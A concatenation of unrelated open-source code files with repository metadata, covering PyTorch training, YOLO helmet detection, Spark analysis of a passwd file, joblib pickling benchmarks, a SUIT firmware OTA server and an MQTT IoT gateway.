logger.info("Train process") logger.info('epoch: {} loss: {} acc {}'.format(epoch, (train_loss/len(trainloader)), 100.*correct/total)) def test(epoch): global best_acc net.eval() test_loss = 0 correct = 0 total = 0 with torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader): inputs, targets = inputs.to(device), targets.to(device) outputs = net(inputs) loss = criterion(outputs, targets) test_loss += loss.item() _, predicted = outputs.max(1) total += targets.size(0) correct += predicted.eq(targets).sum().item() # progress_bar(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)' # % (test_loss/(batch_idx+1), 100.*correct/total, correct, total)) # Save checkpoint. acc = 100.*correct/total if acc > best_acc: print('Best acc on test renew' + " " + str(acc)) state = { 'net': net.state_dict(), 'acc': acc, 'epoch': epoch, } if not os.path.isdir('checkpoint'): os.mkdir('checkpoint') torch.save(state, './checkpoint/ckpt.pth') best_acc = acc if epoch%10 == 0: logger.info("Test process") logger.info('epoch: {} acc: {} best acc {}'.format(epoch, acc, best_acc)) for epoch in range(start_epoch, start_epoch+args.nepochs): train(epoch) test(epoch) scheduler.step() # 阶段性调整学习率 ```
{ "source": "aaavinash85/Automated-Traffic_RuleViolationDetection_System", "score": 3 }
#### File: src/application code/helm.py ```python from time import sleep import cv2 as cv import argparse import sys import numpy as np import os.path from glob import glob #from PIL import image frame_count = 0 # used in mainloop where we're extracting images., and then to drawPred( called by post process) frame_count_out=0 # used in post process loop, to get the no of specified class value. # Initialize the parameters confThreshold = 0.5 #Confidence threshold nmsThreshold = 0.4 #Non-maximum suppression threshold inpWidth = 416 #Width of network's input image inpHeight = 416 #Height of network's input image # Load names of classes classesFile = "/Downloads/Automated-Traffic-Rule-Violation-Detection-System/dev/ML/model/obj.names"; classes = None with open(classesFile, 'rt') as f: classes = f.read().rstrip('\n').split('\n') # Give the configuration and weight files for the model and load the network using them. modelConfiguration = "/Downloads/Automated-Traffic-Rule-Violation-Detection-System/dev/ML/model/yolov3-obj.cfg"; modelWeights = "/Downloads/Automated-Traffic-Rule-Violation-Detection-System/dev/ML/model/yolov3-obj_2400.weights"; net = cv.dnn.readNetFromDarknet(modelConfiguration, modelWeights) net.setPreferableBackend(cv.dnn.DNN_BACKEND_OPENCV) net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU) # Get the names of the output layers def getOutputsNames(net): # Get the names of all the layers in the network layersNames = net.getLayerNames() # Get the names of the output layers, i.e. the layers with unconnected outputs return [layersNames[i[0] - 1] for i in net.getUnconnectedOutLayers()] # Draw the predicted bounding box def drawPred(classId, conf, left, top, right, bottom, frame): global frame_count # Draw a bounding box. #cv.rectangle(frame, (left, top), (right, bottom), (255, 178, 50), 3) label = '%.2f' % conf # Get the label for the class name and its confidence if classes: assert(classId < len(classes)) label = '%s:%s' % (classes[classId], label) #Display the label at the top of the bounding box labelSize, baseLine = cv.getTextSize(label, cv.FONT_HERSHEY_SIMPLEX, 0.5, 1) top = max(top, labelSize[1]) #print(label) #testing #print(labelSize) #testing #print(baseLine) #testing label_name,label_conf = label.split(':') #spliting into class & confidance. will compare it with person. if label_name == 'Helmet': #will try to print of label have people.. or can put a counter to find the no of people occurance. #will try if it satisfy the condition otherwise, we won't print the boxes or leave it. #cv.rectangle(frame, (left, top - round(1.5*labelSize[1])), (left + round(1.5*labelSize[0]), top + baseLine), (255, 255, 255), cv.FILLED) #cv.putText(frame, label, (left, top), cv.FONT_HERSHEY_SIMPLEX, 0.75, (0,0,0), 1) frame_count+=1 #print(frame_count) if(frame_count> 0): return frame_count # Remove the bounding boxes with low confidence using non-maxima suppression def postprocess(frame, outs): frameHeight = frame.shape[0] frameWidth = frame.shape[1] global frame_count_out frame_count_out=0 classIds = [] confidences = [] boxes = [] # Scan through all the bounding boxes output from the network and keep only the # ones with high confidence scores. Assign the box's class label as the class with the highest score. 
classIds = [] #have to fins which class have hieghest confidence........=====>>><<<<======= confidences = [] boxes = [] for out in outs: for detection in out: scores = detection[5:] classId = np.argmax(scores) confidence = scores[classId] if confidence > confThreshold: center_x = int(detection[0] * frameWidth) center_y = int(detection[1] * frameHeight) width = int(detection[2] * frameWidth) height = int(detection[3] * frameHeight) left = int(center_x - width / 2) top = int(center_y - height / 2) classIds.append(classId) #print(classIds) confidences.append(float(confidence)) boxes.append([left, top, width, height]) # Perform non maximum suppression to eliminate redundant overlapping boxes with # lower confidences. indices = cv.dnn.NMSBoxes(boxes, confidences, confThreshold, nmsThreshold) count_person=0 # for counting the classes in this loop. for i in indices: i = i[0] box = boxes[i] left = box[0] top = box[1] width = box[2] height = box[3] #this function in loop is calling drawPred so, try pushing one test counter in parameter , so it can calculate it. frame_count_out = drawPred(classIds[i], confidences[i], left, top, left + width, top + height, frame) #increase test counter till the loop end then print... #checking class, if it is a person or not my_class='Helmet' #======================================== mycode ..... unknown_class = classes[classId] if my_class == unknown_class: count_person += 1 #if(frame_count_out > 0): #print(frame_count_out) if count_person >= 1: path = 'test_out/' # frame_name=os.path.basename(fn) # trimm the path and give file name. #cv.imwrite(str(path)+frame_name, frame) # writing to folder. #print(type(frame)) #cv.imshow('img',frame) #cv.waitKey(800) return 1 else: return 0 #cv.imwrite(frame_name, frame) #======================================mycode......... # Process inputs winName = 'Deep learning object detection in OpenCV' cv.namedWindow(winName, cv.WINDOW_NORMAL) def detect(frame): #frame = cv.imread(fn) frame_count =0 # Create a 4D blob from a frame. blob = cv.dnn.blobFromImage(frame, 1/255, (inpWidth, inpHeight), [0,0,0], 1, crop=False) # Sets the input to the network net.setInput(blob) # Runs the forward pass to get output of the output layers outs = net.forward(getOutputsNames(net)) # Remove the bounding boxes with low confidence # Put efficiency information. The function getPerfProfile returns the overall time for inference(t) and the timings for each of the layers(in layersTimes) t, _ = net.getPerfProfile() #print(t) label = 'Inference time: %.2f ms' % (t * 1000.0 / cv.getTickFrequency()) #print(label) #cv.putText(frame, label, (0, 15), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255)) #print(label) k=postprocess(frame, outs) if k: return 1 else: return 0 ```
{ "source": "aaayushsingh/ios-runtime", "score": 3 }
#### File: build/scripts/update-version.py ```python import os import sys import json import get_version if len(sys.argv) < 2: print "Package.json location argument is missing" sys.exit(2) def getCommitSHA(): commitSHA = os.environ.get('GIT_COMMIT'); if commitSHA == None: return os.popen("git rev-parse HEAD").read().replace("\n", ""); def updatePackageVersion(): data = get_version.readPackageJSON(sys.argv[1]) data["version"] = get_version.getPackageVersion(data["version"]) commitSHA = getCommitSHA() if commitSHA: data["repository"]["url"] += "/commit/" + commitSHA with open(sys.argv[1], "w") as jsonFile: jsonFile.write(json.dumps(data, indent=2)) if __name__ == "__main__": updatePackageVersion() ```
{ "source": "AAB87/SparkExercises", "score": 3 }
#### File: SparkRDD/PasswordAnalysis/passwdAnalysis.py ```python import sys from pyspark import SparkConf, SparkContext def count_user_accounts(passwd_file) -> None: user_accounts = passwd_file \ .count() print("The number of user accounts is: %i \n" % user_accounts) def display_name_uid_gid_sorted_by_name(passwd_file_by_fields) -> None: users_by_name = passwd_file_by_fields \ .sortBy(lambda line: line[0]) \ .map(lambda line: [line[0], line[2], line[3]]) \ .take(5) for (user_name, user_UID, user_GID) in users_by_name: print("User name: %s, UID: %s, GID: %s" % (user_name, user_UID, user_GID)) def count_users_with_bash_command(passwd_file_by_fields) -> None: users_with_bash = passwd_file_by_fields \ .filter(lambda line: line[6] == "/bin/bash") \ .count() print("\nThe number of users having 'bash' as command when logging is: %i" % users_with_bash) def main(file_name: str) -> None: spark_conf = SparkConf() spark_context = SparkContext(conf=spark_conf) logger = spark_context._jvm.org.apache.log4j logger.LogManager.getLogger("org").setLevel(logger.Level.WARN) passwd_file = spark_context.textFile(sys.argv[1]) count_user_accounts(passwd_file) passwd_file_by_fields = passwd_file.map(lambda line: line.split(':')) display_name_uid_gid_sorted_by_name(passwd_file_by_fields) count_users_with_bash_command(passwd_file_by_fields) if __name__ == "__main__": """ Python program that uses Apache Spark to: 1) Count the number of users accounts in Unix passwd file 2) Show user name, UID and GID for the first alphabetical sorted accounts in Unix passwd file 3) Count the number of users having "bash" command when logging """ if len(sys.argv) != 2: print("Usage: spark-submit passwdAnalysis.py <file>", file=sys.stderr) exit(-1) main(sys.argv[1]) ```
{ "source": "aabadie/joblib", "score": 2 }
#### File: joblib/benchmarks/bench_pickle.py ```python import os import time import shutil import numpy as np import joblib import gc from joblib.disk import disk_used try: from memory_profiler import memory_usage except ImportError: memory_usage = None def clear_out(): """Clear output directory.""" if os.path.exists('out'): shutil.rmtree('out') os.mkdir('out') def kill_disk_cache(): """Clear disk cache to avoid side effects.""" if os.name == 'posix' and os.uname()[0] == 'Linux': try: os.system('sudo sh -c "sync; echo 3 > /proc/sys/vm/drop_caches"') except IOError as e: if e.errno == 13: print('Please run me as root') else: raise else: # Write ~100M to the disk open('tmp', 'wb').write(np.random.random(2e7)) def delete_obj(obj): """Force destruction of an object.""" if obj is not None: del obj gc.collect() def memory_used(func, *args, **kwargs): """Compute memory usage of func.""" if memory_usage is None: return np.NaN gc.collect() mem_use = memory_usage((func, args, kwargs), interval=.001) return max(mem_use) - min(mem_use) def timeit(func, *args, **kwargs): """Compute the mean execution time of func based on 7 measures.""" times = [] tries = kwargs['tries'] kwargs.pop('tries') if tries > 1: tries += 2 for _ in range(tries): kill_disk_cache() t0 = time.time() out = func(*args, **kwargs) if 1: # Just time the function t1 = time.time() times.append(t1 - t0) else: # Compute a hash of the output, to estimate the time # necessary to access the elements: this is a better # estimate of the time to load with me mmapping. joblib.hash(out) t1 = time.time() joblib.hash(out) t2 = time.time() times.append(t2 - t0 - 2 * (t2 - t1)) times.sort() return np.mean(times[1:-1]) if tries > 1 else t1 - t0, out def generate_rand_dict(size, with_arrays=False, with_string=False, array_shape=(10, 10)): """Generate dictionary with random values from list of keys.""" ret = {} rnd = np.random.RandomState(0) randoms = rnd.random_sample((size)) for key, random in zip(range(size), randoms): if with_arrays: ret[str(key)] = rnd.random_sample(array_shape) elif with_string: ret[str(key)] = str(random) else: ret[str(key)] = int(random) return ret def generate_rand_list(size, with_arrays=False, with_string=False, array_shape=(10, 10)): """Generate list with random values from list of keys.""" ret = [] rnd = np.random.RandomState(0) for random in rnd.random_sample((size)): if with_arrays: ret.append(rnd.random_sample(array_shape)) elif with_string: ret.append(str(random)) else: ret.append(int(random)) return ret def print_line(dataset, strategy, write_time, read_time, mem_write, mem_read, disk_used): """Nice printing function.""" print('% 15s, %12s, % 6.3f, % 7.4f, % 9.1f, % 9.1f, % 5.1f' % ( dataset, strategy, write_time, read_time, mem_write, mem_read, disk_used)) def print_bench_summary(args): """Nice bench summary function.""" summary = """Benchmark summary: - Global values: . Joblib version: {} . Number of tries to compute mean execution time: {} . Compression levels : {} . Compression algorithm: {} . Memory map mode : {} . Bench nifti data : {} . Bench big array : {} . Bench 2 big arrays : {} . Bench big dictionary: {} . Bench array+dict : {} """.format(joblib.__version__, args.tries, ", ".join(map(str, args.compress)), "None" if not args.compress else args.compressor, args.mmap, args.nifti, args.array, args.arrays, args.dict, args.combo) if args.array: shape = tuple(args.shape) size = round(np.multiply.reduce(shape) * 8 / 1024 ** 2, 1) summary += """ - Big array: . shape: {} . 
size in memory: {} MB """.format(str(shape), size) if args.dict: summary += """ - Big dictionary: . number of keys: {} . value type: {} """.format(args.size, 'np.ndarray' if args.valuearray else 'str' if args.valuestring else 'int') if args.valuearray: summary += """ . arrays shape: {} """.format(str(tuple(args.valuearrayshape))) if args.list: summary += """ - Big list: . number of elements: {} . value type: {} """.format(args.size, 'np.ndarray' if args.valuearray else 'str' if args.valuestring else 'int') if args.valuearray: summary += """ . arrays shape: {} """.format(str(tuple(args.valuearrayshape))) print(summary) def bench_compress(dataset, name='', compress=('zlib', 0), cache_size=0, tries=5): """Bench joblib dump and load functions, compress modes.""" # generate output compression strategy string before joblib compatibility # check as it may override the compress variable with a non tuple type. compress_str = "Raw" if compress[1] == 0 else "{} {}".format(*compress) # joblib versions prior to 0.10 doesn't support tuple in compress argument # so only the second element of the tuple is used for those versions # and the compression strategy is ignored. if (isinstance(compress, tuple) and tuple(map(int, joblib.__version__.split('.')[:2])) < (0, 10)): compress = compress[1] time_write = time_read = du = mem_read = mem_write = [] clear_out() time_write, obj = timeit(joblib.dump, dataset, 'out/test.pkl', tries=tries, compress=compress, cache_size=cache_size) del obj gc.collect() mem_write = memory_used(joblib.dump, dataset, 'out/test.pkl', compress=compress, cache_size=cache_size) delete_obj(dataset) du = disk_used('out') / 1024. time_read, obj = timeit(joblib.load, 'out/test.pkl', tries=tries) delete_obj(obj) mem_read = memory_used(joblib.load, 'out/test.pkl') print_line(name, compress_str, time_write, time_read, mem_write, mem_read, du) def bench_mmap(dataset, name='', cache_size=0, mmap_mode='r', tries=5): """Bench joblib dump and load functions, memmap modes.""" time_write = time_read = du = [] clear_out() time_write, _ = timeit(joblib.dump, dataset, 'out/test.pkl', tries=tries, cache_size=cache_size) mem_write = memory_used(joblib.dump, dataset, 'out/test.pkl', cache_size=cache_size) delete_obj(dataset) time_read, obj = timeit(joblib.load, 'out/test.pkl', tries=tries, mmap_mode=mmap_mode) delete_obj(obj) mem_read = memory_used(joblib.load, 'out/test.pkl', mmap_mode=mmap_mode) du = disk_used('out') / 1024. print_line(name, 'mmap %s' % mmap_mode, time_write, time_read, mem_write, mem_read, du) def run_bench(func, obj, name, **kwargs): """Run the benchmark function.""" func(obj, name, **kwargs) def run(args): """Run the full bench suite.""" if args.summary: print_bench_summary(args) if (not args.nifti and not args.array and not args.arrays and not args.dict and not args.list and not args.combo): print("Nothing to bench. 
Exiting") return compress_levels = args.compress compress_method = args.compressor mmap_mode = args.mmap container_size = args.size a1_shape = tuple(args.shape) a2_shape = (10000000, ) print('% 15s, %12s, % 6s, % 7s, % 9s, % 9s, % 5s' % ( 'Dataset', 'strategy', 'write', 'read', 'mem_write', 'mem_read', 'disk')) if args.nifti: # Nifti images try: import nibabel except ImportError: print("nibabel is not installed skipping nifti file benchmark.") else: def load_nii(filename): img = nibabel.load(filename) return img.get_data(), img.get_affine() for name, nifti_file in ( ('MNI', '/usr/share/fsl/data/atlases' '/MNI/MNI-prob-1mm.nii.gz'), ('Juelich', '/usr/share/fsl/data/atlases' '/Juelich/Juelich-prob-2mm.nii.gz'), ): for c_order in (True, False): name_d = '% 5s(%s)' % (name, 'C' if c_order else 'F') for compress_level in compress_levels: d = load_nii(nifti_file) if c_order: d = (np.ascontiguousarray(d[0]), d[1]) run_bench(bench_compress, d, name_d, compress=(compress_method, compress_level), tries=args.tries) del d if not args.nommap: d = load_nii(nifti_file) if c_order: d = (np.ascontiguousarray(d[0]), d[1]) run_bench(bench_mmap, d, name_d, mmap_mode=mmap_mode, tries=args.tries) del d # Generate random seed rnd = np.random.RandomState(0) if args.array: # numpy array name = '% 5s' % 'Big array' for compress_level in compress_levels: a1 = rnd.random_sample(a1_shape) run_bench(bench_compress, a1, name, compress=(compress_method, compress_level), tries=args.tries) del a1 if not args.nommap: a1 = rnd.random_sample(a1_shape) run_bench(bench_mmap, a1, name, mmap_mode=mmap_mode, tries=args.tries) del a1 if args.arrays: # Complex object with 2 big arrays name = '% 5s' % '2 big arrays' for compress_level in compress_levels: obj = [rnd.random_sample(a1_shape), rnd.random_sample(a2_shape)] run_bench(bench_compress, obj, name, compress=(compress_method, compress_level), tries=args.tries) del obj if not args.nommap: obj = [rnd.random_sample(a1_shape), rnd.random_sample(a2_shape)] run_bench(bench_mmap, obj, name, mmap_mode=mmap_mode, tries=args.tries) del obj if args.dict: # Big dictionary name = '% 5s' % 'Big dict' array_shape = tuple(args.valuearrayshape) for compress_level in compress_levels: big_dict = generate_rand_dict(container_size, with_arrays=args.valuearray, with_string=args.valuestring, array_shape=array_shape) run_bench(bench_compress, big_dict, name, compress=(compress_method, compress_level), tries=args.tries) del big_dict if not args.nommap: big_dict = generate_rand_dict(container_size, with_arrays=args.valuearray, with_string=args.valuestring, array_shape=array_shape) run_bench(bench_mmap, big_dict, name, mmap_mode=mmap_mode, tries=args.tries) del big_dict if args.list: # Big dictionary name = '% 5s' % 'Big list' array_shape = tuple(args.valuearrayshape) for compress_level in compress_levels: big_list = generate_rand_list(container_size, with_arrays=args.valuearray, with_string=args.valuestring, array_shape=array_shape) run_bench(bench_compress, big_list, name, compress=(compress_method, compress_level), tries=args.tries) del big_list if not args.nommap: big_list = generate_rand_list(container_size, with_arrays=args.valuearray, with_string=args.valuestring, array_shape=array_shape) run_bench(bench_mmap, big_list, name, mmap_mode=mmap_mode, tries=args.tries) del big_list if args.combo: # 2 big arrays with one big dict name = '% 5s' % 'Dict/arrays' array_shape = tuple(args.valuearrayshape) for compress in compress_levels: obj = [rnd.random_sample(a1_shape), generate_rand_dict(container_size, 
with_arrays=args.valuearray, with_string=args.valuestring, array_shape=array_shape), rnd.random_sample(a2_shape)] run_bench(bench_compress, obj, name, compress=(compress_method, compress_level), tries=args.tries) del obj if not args.nommap: obj = [rnd.random_sample(a1_shape), generate_rand_dict(container_size, with_arrays=args.valuearray, with_string=args.valuestring, array_shape=array_shape), rnd.random_sample(a2_shape)] run_bench(bench_mmap, obj, name, mmap_mode=mmap_mode, tries=args.tries) del obj if __name__ == "__main__": import argparse parser = argparse.ArgumentParser(description="Joblib benchmark script") parser.add_argument('--compress', nargs='+', type=int, default=(0, 3), help="List of compress levels.") parser.add_argument('--compressor', type=str, default='zlib', choices=['zlib', 'gzip', 'bz2', 'xz', 'lzma'], help="Compression algorithm.") parser.add_argument('--mmap', type=str, default='r', choices=['r', 'r+', 'w+'], help="Memory map mode.") parser.add_argument('--tries', type=int, default=5, help="Number of tries to compute execution time" "mean on.") parser.add_argument('--shape', nargs='+', type=int, default=(10000, 10000), help="Big array shape.") parser.add_argument("-m", "--nommap", action="store_true", help="Don't bench memmap") parser.add_argument('--size', type=int, default=10000, help="Big dictionary size.") parser.add_argument('--valuearray', action="store_true", help="Use numpy arrays type in containers " "(list, dict)") parser.add_argument('--valuearrayshape', nargs='+', type=int, default=(10, 10), help="Shape of arrays in big containers.") parser.add_argument('--valuestring', action="store_true", help="Use string type in containers (list, dict).") parser.add_argument("-n", "--nifti", action="store_true", help="Benchmark Nifti data") parser.add_argument("-a", "--array", action="store_true", help="Benchmark single big numpy array") parser.add_argument("-A", "--arrays", action="store_true", help="Benchmark list of big numpy arrays") parser.add_argument("-d", "--dict", action="store_true", help="Benchmark big dictionary.") parser.add_argument("-l", "--list", action="store_true", help="Benchmark big list.") parser.add_argument("-c", "--combo", action="store_true", help="Benchmark big dictionary + list of " "big numpy arrays.") parser.add_argument("-s", "--summary", action="store_true", help="Show bench summary.") run(parser.parse_args()) ```
{ "source": "aabadie/ota-server", "score": 2 }
#### File: ota-server/otaserver/server.py ```python import os import os.path import logging import json import datetime import asyncio from collections import defaultdict import tornado import tornado.platform.asyncio from tornado.options import options from tornado import web from aiocoap import GET from coap import CoapServer, coap_request, COAP_METHOD logger = logging.getLogger("otaserver") def _path_from_publish_id(publish_id): _path = publish_id.replace('/', '_').replace('\\', '_') return _path def _get_versions_from_path(path): files = os.listdir(path) versions = defaultdict(dict) for file in files: version = file.split('.')[-2] if version == 'latest': continue if version == 'riot': version = file.split('.')[-3] if 'riot.suit' in file: versions[version]['manifest'] = file if 'slot0' in file: versions[version]['slot0'] = file if 'slot1' in file: versions[version]['slot1'] = file return versions def _get_applications(path): applications = [] for d in os.listdir(path): board, name = d.split('_', 1) applications.append( { 'id': d, 'name': name, 'board': board, 'count':int((len(os.listdir(os.path.join(path, d))) - 1) / 3), 'versions': _get_versions_from_path(os.path.join(path, d)) }) return applications class OTAServerMainHandler(web.RequestHandler): """Web application handler for web page.""" def get(self): logger.debug("Rendering SUIT updates web page") applications = _get_applications(options.upload_path) self.render("otaserver.html", favicon=os.path.join("assets", "favicon.ico"), title="SUIT Update Server", applications=applications, host=options.http_host, port=options.http_port) class OTAServerRemoveHandler(tornado.web.RequestHandler): """Handler for removing an existing version.""" async def post(self): """Handle request for removing an existing version.""" request = json.loads(self.request.body.decode()) logger.debug("Removing version %s in application %s", request['version'], request['publish_id']) for publish_id in os.listdir(options.upload_path): if publish_id == request['publish_id']: for filename in os.listdir( os.path.join(options.upload_path, publish_id)): if str(request['version']) not in filename: continue logger.debug("Removing file %s", filename) file = os.path.join( options.upload_path, publish_id, filename) if os.path.exists(file): os.remove(file) class OTAServerCoapUrlHandler(web.RequestHandler): """Web application handler for getting the CoAP url.""" async def get(self): _coap_uri = 'coap://{}:{}'.format(options.coap_host, options.coap_port) _publish_id = self.request.path.split('/')[-1] _coap_url = '{}/{}'.format(_coap_uri, _publish_id) logger.debug("Sending CoAP server url: %s", _coap_url) self.write(_coap_url) class OTAServerNotifyHandler(tornado.web.RequestHandler): """Handler for notifying an update to a list of devices.""" async def post(self): """Handle notification of an available update.""" publish_id = self.request.body_arguments['publish_id'][0].decode() publish_path = _path_from_publish_id(publish_id) _store_path = os.path.join(self.application.upload_path, publish_id) base_filename = os.listdir(_store_path)[0].split('-')[0] slot0_manifest_url = os.path.join( publish_path, '{}-slot0.riot.suit.latest.bin'.format(base_filename)) slot1_manifest_url = os.path.join( publish_path, '{}-slot1.riot.suit.latest.bin'.format(base_filename)) devices_urls = self.request.body_arguments['urls'][0].decode() logger.debug('Notifying devices %s of an update of %s', devices_urls, publish_id) for url in devices_urls.split(','): logger.debug('Notifying an update to %s', url) 
inactive_url = '{}/suit/slot/inactive'.format(url) _, payload = await coap_request(inactive_url, method=GET) if int(payload) == 1: manifest_url = slot1_manifest_url else: manifest_url = slot0_manifest_url payload = '{}://{}:{}/{}'.format(COAP_METHOD, options.coap_host, options.coap_port, manifest_url) logger.debug('Manifest url is %s', payload) notify_url = '{}/suit/trigger'.format(url) logger.debug('Send update notification at %s', url) await coap_request(notify_url, payload=payload.encode()) class OTAServerNotifyv4Handler(tornado.web.RequestHandler): """Handler for notifying an update to a list of devices.""" async def post(self): """Handle notification of an available update.""" version = self.request.body_arguments['version'][0].decode() publish_id = self.request.body_arguments['publish_id'][0].decode() publish_path = _path_from_publish_id(publish_id) _store_path = os.path.join(self.application.upload_path, publish_id) base_filename = os.listdir(_store_path)[0].split('-')[0] manifest_url = os.path.join( publish_path, '{}-riot.suitv4_signed.{}.bin'.format(base_filename, version)) devices_urls = self.request.body_arguments['urls'][0].decode() logger.debug('Notifying devices %s of an update of %s', devices_urls, publish_id) for url in devices_urls.split(','): logger.debug('Notifying an update to %s', url) payload = '{}://{}:{}/{}'.format(COAP_METHOD, options.coap_host, options.coap_port, manifest_url) logger.debug('Manifest url is %s', payload) notify_url = '{}/suit/trigger'.format(url) logger.debug('Send update notification at %s', url) await coap_request(notify_url, payload=payload.encode()) class OTAServerPublishHandler(tornado.web.RequestHandler): """Handler for storing published firmwares.""" def _store(self, store_url, data): _store_path = os.path.join(self.application.upload_path, store_url) if not os.path.exists(_store_path): os.makedirs(_store_path) # Store each data in separate files for name, content in data.items(): _path = os.path.join(_store_path, name) logger.debug('Storing file %s', _path) with open(_path, 'wb') as f: f.write(content) # Hack to determine if the file is a manifest and copy as latest _path_split = _path.split('.') if 'suit' == _path_split[-3] or 'suitv4_signed' == _path_split[-3]: _path_split[-2] = 'latest' _path = '.'.join(_path_split) with open(_path, 'wb') as f: f.write(content) async def post(self): """Handle publication of an update.""" # Verify the request contains the required files files = self.request.files msg = None if len(files) == 0: msg = "No file found in request" if msg is not None: self.set_status(400, msg) self.finish(msg) return # Load the content of the files from the request update_data = {} for file in files: filename = os.path.basename(file) update_data[filename] = files[file][0]['body'] # Get publish identifier publish_id = self.request.body_arguments['publish_id'][0].decode() # Cleanup the path store_path = _path_from_publish_id(publish_id) logger.debug('Storing %s update', publish_id) # Store the data and create the corresponding CoAP resources self._store(store_path, update_data) if options.with_coap_server: self.application.coap_server.add_resources(store_path) class OTAServerApplication(web.Application): """Tornado based web application providing the OTA server.""" def __init__(self): if options.debug: logger.setLevel(logging.DEBUG) handlers = [ (r"/", OTAServerMainHandler), (r"/publish", OTAServerPublishHandler), (r"/remove", OTAServerRemoveHandler), (r"/notify", OTAServerNotifyHandler), (r"/notifyv4", OTAServerNotifyv4Handler), 
(r"/coap/url/.*", OTAServerCoapUrlHandler), ] settings = dict(debug=True, static_path=options.static_path, template_path=options.static_path,) self.upload_path = options.upload_path if options.with_coap_server: self.coap_server = CoapServer(self.upload_path, port=options.coap_port) super().__init__(handlers, **settings) logger.info('Application started, listening on port {}' .format(options.http_port)) ```
{ "source": "aabadie/pyaiot", "score": 2 }
#### File: pyaiot/common/messaging.py ```python import json import logging logger = logging.getLogger("pyaiot.messaging") class Message(): """Utility class for generating and parsing service messages.""" @staticmethod def serialize(message): return json.dumps(message, ensure_ascii=False) @staticmethod def new_node(uid, dst="all"): """Generate a text message indicating a new node.""" return Message.serialize({'type': 'new', 'uid': uid, 'dst': dst}) @staticmethod def out_node(uid): """Generate a text message indicating a node to remove.""" return Message.serialize({'type': 'out', 'uid': uid}) @staticmethod def update_node(uid, endpoint, data, dst="all"): """Generate a text message indicating a node update.""" return Message.serialize({'type': 'update', 'uid': uid, 'endpoint': endpoint, 'data': data, 'dst': dst}) @staticmethod def discover_node(): """Generate a text message for websocket node discovery.""" return Message.serialize({'request': 'discover'}) @staticmethod def check_message(raw): """Verify a received message is correctly formatted.""" reason = None try: message = json.loads(raw) except TypeError as e: logger.warning(e) reason = "Invalid message '{}'.".format(raw) message = None except json.JSONDecodeError: reason = ("Invalid message received " "'{}'. Only JSON format is supported.".format(raw)) message = None if message is not None: if not hasattr(message, '__iter__'): reason = "Invalid message '{}'.".format(message) elif 'type' not in message and 'data' not in message: reason = "Invalid message '{}'.".format(message) elif (message['type'] != 'new' and message['type'] != 'update' and message['type'] != 'out'): reason = "Invalid message type '{}'.".format(message['type']) if reason is not None: logger.warning(reason) message = None return message, reason ``` #### File: gateway/mqtt/mqtt.py ```python import time import uuid import json import asyncio import logging from tornado import gen from tornado.options import options from hbmqtt.client import MQTTClient, ClientException from hbmqtt.mqtt.constants import QOS_1 from pyaiot.common.messaging import Message as Msg logger = logging.getLogger("pyaiot.gw.mqtt") MQTT_HOST = 'localhost' MQTT_PORT = 1886 MAX_TIME = 120 class MQTTNode(object): """Object defining a MQTT node.""" def __init__(self, identifier, check_time=time.time(), resources=[]): self.node_id = identifier self.check_time = check_time self.resources = resources def __eq__(self, other): return self.node_id == other.node_id def __neq__(self, other): return self.node_id != other.node_id def __hash__(self): return hash(self.node_id) def __repr__(self): return("Node '{}', Last check: {}, Resources: {}" .format(self.node_id, self.check_time, self.resources)) class MQTTController(): """MQTT controller with MQTT client inside.""" def __init__(self, on_message_cb, port=MQTT_PORT, max_time=MAX_TIME): # on_message_cb = send_to_broker method in gateway application self._on_message_cb = on_message_cb self.port = port self.max_time = max_time self.nodes = {} self.mqtt_client = MQTTClient() asyncio.get_event_loop().create_task(self.start()) @asyncio.coroutine def start(self): """Connect to MQTT broker and subscribe to node check ressource.""" yield from self.mqtt_client.connect('mqtt://{}:{}' .format(options.mqtt_host, options.mqtt_port)) # Subscribe to 'gateway/check' with QOS=1 yield from self.mqtt_client.subscribe([('node/check', QOS_1)]) while True: try: logger.debug("Waiting for incoming MQTT messages from nodes") # Blocked here until a message is received message = yield from 
self.mqtt_client.deliver_message() except ClientException as ce: logger.error("Client exception: {}".format(ce)) break except Exception as exc: logger.error("General exception: {}".format(exc)) break packet = message.publish_packet topic_name = packet.variable_header.topic_name data = json.loads(packet.payload.data.decode('utf-8')) logger.debug("Received message from node: {} => {}" .format(topic_name, data)) if topic_name.endswith("/check"): asyncio.get_event_loop().create_task( self.handle_node_check(data)) elif topic_name.endswith("/resources"): asyncio.get_event_loop().create_task( self.handle_node_resources(topic_name, data)) else: self.handle_node_update(topic_name, data) def close(self): loop = asyncio.get_event_loop() loop.run_until_complete(self._disconnect()) @asyncio.coroutine def _disconnect(self): for node in self.nodes: yield from self._disconnect_from_node(node) yield from self.mqtt_client.disconnect() @asyncio.coroutine def handle_node_check(self, data): """Handle alive message received from coap node.""" node_id = data['id'] node = MQTTNode(node_id) node.check_time = time.time() if node not in self.nodes: resources_topic = 'node/{}/resources'.format(node_id) yield from self.mqtt_client.subscribe([(resources_topic, QOS_1)]) logger.debug("Subscribed to topic: {}".format(resources_topic)) node_uid = str(uuid.uuid4()) self.nodes.update({node: {'uid': node_uid, 'data': {'protocol': 'mqtt'}}}) logger.debug("Available nodes: {}".format(self.nodes)) self._on_message_cb(Msg.new_node(node_uid)) self._on_message_cb(Msg.update_node(node_uid, "protocol", 'mqtt')) discover_topic = 'gateway/{}/discover'.format(node_id) yield from self.mqtt_client.publish(discover_topic, b"resources", qos=QOS_1) logger.debug("Published '{}' to topic: {}".format("resources", discover_topic)) else: data = self.nodes.pop(node) self.nodes.update({node: data}) logger.debug("Available nodes: {}".format(self.nodes)) @asyncio.coroutine def handle_node_resources(self, topic, data): """Process resources published by a node.""" node_id = topic.split("/")[1] node = None for n in self.nodes.keys(): if n.node_id == node_id: node = n break if node is None: return node.resources = data yield from self.mqtt_client.subscribe( [('node/{}/{}'.format(node_id, resource), QOS_1) for resource in data]) yield from self.mqtt_client.publish('gateway/{}/discover' .format(node_id), b"values", qos=QOS_1) def handle_node_update(self, topic_name, data): """Handle CoAP post message sent from coap node.""" _, node_id, resource = topic_name.split("/") node = MQTTNode(node_id) value = data['value'] if node in self.nodes: if resource in self.nodes[node]['data']: # Add updated information to cache self.nodes[node]['data'][resource] = value else: self.nodes[node]['data'].update({resource: value}) # Send update to broker self._on_message_cb(Msg.update_node( self.nodes[node]['uid'], resource, value)) @gen.coroutine def fetch_nodes_cache(self, source): """Send cached nodes information.""" logger.debug("Fetching cached information of registered nodes '{}'." 